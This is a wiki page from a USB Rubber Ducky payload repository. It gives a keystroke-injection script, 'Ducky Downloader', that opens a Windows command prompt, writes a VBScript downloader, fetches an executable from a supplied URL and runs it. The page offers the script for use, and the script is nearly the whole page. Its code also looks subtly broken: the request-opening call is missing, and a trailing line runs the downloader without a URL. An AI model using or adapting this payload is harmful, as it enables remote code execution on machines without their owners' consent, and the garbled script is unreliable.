Payload ducky downloader - a3rd/USB-Rubber-Ducky GitHub Wiki
Ducky Downloader
Author: Haysoos Duckencoder: 1.2 Target: Windows 7 Description: Opens the command prompt (not as administrator) creates a VBscript to download a file from any URL. Downloads a file and executes it. Useful for downloading small .exe files from a web server and executing them.
ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 ENTER DELAY 400 STRING copy con download.vbs ENTER STRING Set args = WScript.Arguments:a = split(args(0), "/")(UBound(split(args(0),"/"))) ENTER STRING Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") "GET", args(0), false:objXMLHTTP.send() ENTER STRING If objXMLHTTP.Status = 200 Then ENTER STRING Set objADOStream = CreateObject("ADODB.Stream"):objADOStream.Open ENTER STRING objADOStream.Type = 1:objADOStream.Write objXMLHTTP.ResponseBody:objADOStream.Position = 0 ENTER STRING Set objFSO = Createobject("Scripting.FileSystemObject"):If objFSO.Fileexists(a) Then objFSO.DeleteFile a ENTER STRING objADOStream.SaveToFile a:objADOStream.Close:Set objADOStream = Nothing ENTER STRING End if:Set objXMLHTTP = Nothing:Set objFSO = Nothing ENTER CTRL z ENTER STRING cscript download.vbs <INSERT URL HERE> ENTER STRING <INSERT EXE FILENAME HERE> ENTER STRING exit ENTER
... ENTER STRING cscript download.vbs ENTER STRING fun_windows_executable.exe ENTER STRING exit ENTER